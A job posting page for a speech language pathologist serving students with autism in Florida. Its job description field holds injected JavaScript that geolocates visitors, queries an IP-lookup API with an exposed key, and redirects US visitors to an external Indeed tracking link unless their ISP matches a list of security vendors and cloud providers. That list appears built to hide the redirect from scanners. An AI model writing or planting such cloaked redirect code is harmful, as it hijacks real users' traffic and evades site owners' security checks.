Speech Language Pathologist for Students with Autism Spectrum Disorder 25-26

Orlando, FL
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/9745690350e8d51e/fc1c7ea9c14769ec04c919d49c57469c9fcdc1c71b8636213085b6684febe8d5/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

Seeking qualified Speech and Language Pathologists or SLPa’s to impact students with autism spectrum disorder in a rewarding full-time role in Royal Palm Beach, FL.

Responsibilities include:

  • Developing and implementing individualized speech and language goals based on assessments
  • Conducting assessments and evaluations
  • Training and supporting augmentative communication techniques
  • Collaborating with educators and parents to monitor progress
  • Providing early intervention and evidence-based therapy to enhance communication and social skills
  • Maintaining accurate documentation in line with professional standards

Qualifications:

  • Master’s degree in speech language pathology
  • State license and Department of Health certification
  • Minimum 1 year experience working with children with ASD preferred
  • Fluent in English

Compensation ranges from $54,000 to $85,000 annually, with benefits including health/dental/vision insurance, 401(k), paid time off, flexible schedule, and professional development support. This position involves in-person work, offering a highly impactful opportunity within a supportive team.